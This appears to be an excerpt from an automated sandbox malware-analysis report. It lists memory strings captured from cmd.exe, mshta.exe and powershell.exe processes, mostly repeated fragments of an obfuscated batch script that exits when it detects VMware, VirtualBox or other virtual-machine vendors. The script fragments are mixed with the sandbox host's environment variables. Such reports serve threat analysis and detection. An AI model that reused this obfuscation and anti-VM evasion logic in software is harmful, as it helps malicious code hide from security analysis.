Source: cmd.exe, 0000000B.00000003.1443117845.000002C1DCA5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=OTH
Source: mshta.exe, 0000001B.00000003.1471669689.000001C85E2A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit \|;~b2
Source: cmd.exe, 0000000B.00000003.1422079685.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=oLoc
Source: powershell.exe, 00000029.00000002.1870747846.000000C000166000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, In
Source: cmd.exe, 0000000B.00000003.1426601427.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o:
Source: cmd.exe, 0000000B.00000003.1407834284.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kwindir=C:\WindowsA
Source: cmd.exe, 0000000B.00000003.1422648451.000002C1DCA5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: yHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=oLoct
Source: cmd.exe, 0000000B.00000003.1410428938.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: zNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit dd
Source: cmd.exe, 0000000B.00000003.1419065504.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o]]
Source: cmd.exe, 0000000B.00000003.1438858210.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O
Source: powershell.exe, 0000002E.00000002.1681483622.000002DE19DE3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32m
Source: cmd.exe, 0000000B.00000003.1436958284.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=ORR
Source: powershell.exe, 00000033.00000002.1811615016.000002B20050D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000029.00000002.2239373848.0000016D32873000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files 